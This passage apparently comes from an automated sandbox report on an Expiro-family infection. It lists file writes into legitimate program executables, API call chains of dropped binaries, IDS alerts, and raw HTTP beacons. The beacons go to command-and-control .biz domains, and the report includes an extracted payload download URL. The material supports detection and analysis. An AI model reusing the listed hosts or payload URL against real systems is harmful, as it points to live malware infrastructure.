                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{116021C8-78D2-448A-AAC4-399076E36F9D}\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,9_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,9_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,9_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 9_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,9_2_00007FF706EB1560
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF706EB1560
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ABC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,12_2_00007FF627ABC6F8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B2234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,12_2_00007FF627B2234C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B23100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,12_2_00007FF627B23100
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B210C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,12_2_00007FF627B210C4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B26F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,12_2_00007FF627B26F80
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B03674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,12_2_00007FF627B03674
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627A8D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,12_2_00007FF627A8D440
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,12_2_00007FF627ACD4A4
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,12_2_00007FF627ACB3D8
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AC5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,12_2_00007FF627AC5E58
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627ACDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,12_2_00007FF627ACDBC0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B21B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,12_2_00007FF627B21B04
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B219F8 #359,FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF627B219F8
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,15_2_02DF5908
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,16_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,16_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,16_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,16_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 16_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00007FF706EB1560
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,17_2_00007FF706EC2978
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EC823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,17_2_00007FF706EC823C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706ED7B4C FindFirstFileW,FindNextFileW,FindClose,17_2_00007FF706ED7B4C
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,17_2_00007FF706EB35B8
                      Source: C:\Users\Public\alpha.exeCode function: 17_2_00007FF706EB1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,17_2_00007FF706EB1560
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exeFile opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe

                      Networking

                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:49817 -> 54.244.188.177:80
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:62395 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:65337 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:62937 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:57324 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50027 -> 34.211.97.45:80
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:55594 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.10:50727 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50109 -> 54.244.188.177:80
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:62389 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.10:57250 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.10:55845 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.10:50229 -> 18.208.156.248:80
                      Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.10:65043 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:49726 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.10:53030 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.10:57393 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.10:51342 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:64376 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.10:51678 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.10:54841 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.10:56235 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.10:63327 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.10:57486 -> 1.1.1.1:53
                      Source: Malware configuration extractorURLs: https://gxe0.com/yak2/233_Juqmtmyadyy
                      Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                      Source: unknownNetwork traffic detected: DNS query count 131
                      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02E0E4B8 InternetCheckConnectionA,15_2_02E0E4B8
                      Source: global trafficTCP traffic: 192.168.2.10:49859 -> 51.195.88.199:587
                      Source: global trafficDNS traffic detected: number of DNS queries: 131
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49731 -> 198.252.105.91:443
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.10:49813
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.10:49813
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.10:49801
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.10:49801
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.10:49837
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.10:49837
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.10:50037
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.10:50027
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.10:50027
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.10:50037
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.10:50022
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.10:50022
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.10:50000
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.10:50034
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.10:50034
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.10:50015
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.10:50015
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.10:50035
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.10:50035
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.10:50066
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.10:50066
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.10:50000
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.10:50079
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.10:50079
                      Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /nkrerhrn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /iu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /obvywkjre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /njfejhipdedfbx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /gcjwtno HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /itufvxod HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /jpdqgjmmo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /rneunjrpeefdom HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /jnek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ogua HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /yypcywwrp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /mekek HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /qfuwtgjk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /mdv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /tcewuceccwlpap HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /kiuupxbhsmi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /llpilismcsqqsd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /aldxsqumvddjjq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
                      Source: global trafficHTTP traffic detected: POST /qwmkydqbbfrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                      Source: global trafficHTTP traffic detected: POST /ebrtsarfcsylm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
